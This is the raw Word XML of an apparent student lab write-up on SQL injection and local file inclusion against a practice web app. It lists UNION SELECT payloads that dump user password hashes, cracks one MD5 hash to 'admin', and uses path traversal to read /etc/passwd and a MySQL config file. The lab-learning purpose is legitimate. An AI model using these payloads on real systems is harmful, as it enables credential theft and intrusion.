    <w:p w14:paraId="2CC59354" w14:textId="77777777" w:rsidR="00222695" w:rsidRDefault="00222695" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E7D0332" w14:textId="23025D64" w:rsidR="007F1736" w:rsidRDefault="007F1736" w:rsidP="00F83F92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SQL Injection (easy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5032EB63" w14:textId="3F32717D" w:rsidR="007F1736" w:rsidRDefault="007F1736" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F1736">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>The code has no validation on the parameter I provide. So in the sql statement I can input some code to find a vunerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0457A081" w14:textId="6D25A36E" w:rsidR="007F1736" w:rsidRPr="007F1736" w:rsidRDefault="007F1736" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57FB9318" wp14:editId="62F5B86F">
            <wp:extent cx="4997302" cy="3000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761"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5015653" cy="301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B07C4" w14:textId="0D38A77F" w:rsidR="007F1736" w:rsidRDefault="007F1736" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F1736">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="71553E22" wp14:editId="4610B6D2">
            <wp:extent cx="4944140" cy="3711665"/>
            <wp:effectExtent l="0" t="0" r="889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555" cy="37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888F" w14:textId="70A787FB" w:rsidR="007F1736" w:rsidRDefault="007F1736" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">To determine how many columns I attempted </w:t>
      </w:r>
      <w:r w:rsidRPr="007F1736">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">' ORDER BY </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="007F1736">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> etc until I entered </w:t>
      </w:r>
      <w:r w:rsidRPr="007F1736">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>' ORDER BY 3 #</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> which gave the following</w:t>
      </w:r>
      <w:r w:rsidR="00A07C47">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517E79DE" w14:textId="6618A948" w:rsidR="007F1736" w:rsidRDefault="007F1736" w:rsidP="00F83F9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55EB3B6" wp14:editId="5D213604">
            <wp:extent cx="2505075" cy="314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2E29" w14:textId="759B51AE" w:rsidR="00A07C47" w:rsidRDefault="00A07C47" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">So I have established there are two columns. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629966B6" w14:textId="329DC8D5" w:rsidR="00A07C47" w:rsidRDefault="00A07C47" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A07C47">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">INPUT </w:t>
      </w:r>
      <w:r w:rsidRPr="00A07C47">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>' UNION SELECT user, password FROM users#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2E70E3" w14:textId="4BE427E9" w:rsidR="00A07C47" w:rsidRDefault="00A07C47" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A07C47">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="357417F7" wp14:editId="582FEC4B">
            <wp:extent cx="4635795" cy="28813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728" b="5656"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4667113" cy="290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C0152" w14:textId="1EE22CD9" w:rsidR="00A07C47" w:rsidRDefault="00D06A50" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D06A50">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251669504" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2BC1A490" wp14:editId="7C1F0512">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>2694305</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>233045</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3505200" cy="2795905"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21487"/>
                <wp:lineTo x="21483" y="21487"/>
                <wp:lineTo x="2148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C47">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>It is now displaying each user and their password. We can use kali to</w:t>
      </w:r>
      <w:r w:rsidR="002F531E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> see how to</w:t>
      </w:r>
      <w:r w:rsidR="00A07C47">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> crack this password. (MD5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1B4E4C" w14:textId="5C37CC0B" w:rsidR="00ED52EE" w:rsidRDefault="00D06A50" w:rsidP="00A07C47">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D06A50">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>The password</w:t>
      </w:r>
      <w:r w:rsidR="00ED52EE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED52EE" w:rsidRPr="00ED52EE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>21232f297a57a5a743894a0e4a801fc3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D06A50">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">needs decryption. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639BA08E" w14:textId="77777777" w:rsidR="00ED52EE" w:rsidRDefault="00ED52EE" w:rsidP="00A07C47">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C9E70B3" w14:textId="571CAF03" w:rsidR="00D06A50" w:rsidRPr="00D06A50" w:rsidRDefault="00D06A50" w:rsidP="00A07C47">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D06A50">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0272F2BD" wp14:editId="4631A758">
            <wp:extent cx="3689498" cy="1661215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2084" cy="16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FA13" w14:textId="1C1D8948" w:rsidR="00D06A50" w:rsidRPr="00ED52EE" w:rsidRDefault="00ED52EE" w:rsidP="00A07C47">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED52EE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>The following shows the password is ‘</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED52EE">
        <w:rPr>
          <w:noProof/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>admin’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCF4B2C" w14:textId="77777777" w:rsidR="00D06A50" w:rsidRDefault="00D06A50" w:rsidP="00A07C47">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="173FC562" w14:textId="73D41B63" w:rsidR="00A07C47" w:rsidRPr="00A578F2" w:rsidRDefault="00A07C47" w:rsidP="00A07C47">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SQL Injection (</w:t>
      </w:r>
      <w:r w:rsidR="00A578F2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3774600D" w14:textId="41E834A9" w:rsidR="00A07C47" w:rsidRDefault="00F26C4E" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C676CDB" wp14:editId="49169310">
            <wp:extent cx="4533900" cy="3518720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840" b="1409"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4562004" cy="354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9144F" w14:textId="37D09937" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CB25B5E" w14:textId="4CE541DD" w:rsidR="00F26C4E" w:rsidRDefault="00F26C4E" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F26C4E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03C1C004" wp14:editId="6EF62E42">
            <wp:extent cx="5731510" cy="79057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808A" w14:textId="00F03351" w:rsidR="00F26C4E" w:rsidRDefault="00F26C4E" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">INPUT; </w:t>
      </w:r>
      <w:r w:rsidRPr="00F26C4E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1' UNION SELECT user, password FROM users#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C27640A" w14:textId="6E9EA5FE" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A578F2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="43BCDE88" wp14:editId="709E6DB3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>1971675</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>10795</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3800475" cy="3048000"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21465"/>
                <wp:lineTo x="21546" y="21465"/>
                <wp:lineTo x="21546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9318" r="31365" b="5484"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="38004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Which outputs the following; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323B5789" w14:textId="486B46AB" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AB8BA62" w14:textId="1175AF13" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58E77553" w14:textId="37782BA9" w:rsidR="00A578F2" w:rsidRDefault="00ED52EE" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Now this shows all passwords of all users in the surname field. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E68630B" w14:textId="75AC5989" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FF3D3FA" w14:textId="78181DB8" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50391E71" w14:textId="3A51C5F8" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E248AAA" w14:textId="0AE89838" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18244495" w14:textId="4267D05C" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23B13729" w14:textId="609DDC49" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00F83F92">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="789BFAEE" w14:textId="77777777" w:rsidR="00ED52EE" w:rsidRDefault="00ED52EE" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A433E30" w14:textId="16308FB8" w:rsidR="002F531E" w:rsidRDefault="00A578F2" w:rsidP="00A578F2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L</w:t>
      </w:r>
      <w:r w:rsidRPr="00F83F92">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">FI </w:t>
      </w:r>
      <w:r w:rsidR="00ED52EE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>low;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427DD4D5" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E57660">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5A2492DC" wp14:editId="4822EBB8">
            <wp:extent cx="3552825" cy="16835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074" b="25268"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3571729" cy="169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ABE47" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRPr="00FB0A68" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB0A68">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>I test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>ed it</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB0A68">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> to see if I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB0A68">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> can read a common file such as /etc/passwd.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> This wouldn’t only be limited to the /etc/passwd file rather on any file which has read privileges. Shown in figure1. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64428DE5" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578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EB9DDF6" wp14:editId="69DB6D6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000625" cy="4734560"/>
            <wp:effectExtent l="0" t="0" r="952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A7DCE" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578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399BF" wp14:editId="7AC26E7D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781800" cy="9429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429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026B14" id="Oval 7" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:13.15pt;width:534pt;height:74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" filled="f" strokecolor="red" strokeweight=".5pt">
                <v:stroke joinstyle="miter"/>
                <w10:wrap anchorx="margin"/>
              </v:oval>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC92C18" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CAD498C" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EEB3582" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60709829" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A8A583A" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0867822A" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05F9379D" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4344676F" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3240F480" w14:textId="705E58F8" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E881050" w14:textId="74E6AE64" w:rsidR="00A31CAB" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50BD30BB" w14:textId="05036043" w:rsidR="00A31CAB" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D909426" w14:textId="5E905D47" w:rsidR="00A31CAB" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63576726" w14:textId="2B1D0E66" w:rsidR="00A31CAB" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14BE209F" w14:textId="5CF624C3" w:rsidR="00A31CAB" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69ED4519" w14:textId="4E80BE60" w:rsidR="00A31CAB" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A06D55D" w14:textId="77777777" w:rsidR="00A31CAB" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FFE5434" w14:textId="77777777" w:rsidR="00A31CAB" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65D60480" w14:textId="77777777" w:rsidR="00A31CAB" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E114BEB" w14:textId="77777777" w:rsidR="00A31CAB" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="012F6E60" w14:textId="77777777" w:rsidR="00A31CAB" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C14511A" w14:textId="13A9F919" w:rsidR="00A31CAB" w:rsidRDefault="00A31CAB" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A31CAB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Another test I carried out was ../../../../../../etc/mysql/my.cnf which is shown </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>as;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F0B0EA" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00160E76">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3A311B89" wp14:editId="4CE05CE9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5105400" cy="4810125"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapThrough wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21557"/>
                <wp:lineTo x="21519" y="21557"/>
                <wp:lineTo x="2151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FAF64" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50B85383" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A68B92B" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E94906C" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="147544FF" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71E4A23B" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B30A917" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44D3DAB4" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E7A1545" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C8E9E6D" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0660BBCE" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48117938" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="616439B3" w14:textId="77777777" w:rsidR="00A578F2" w:rsidRDefault="00A578F2" w:rsidP="00A578F2">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
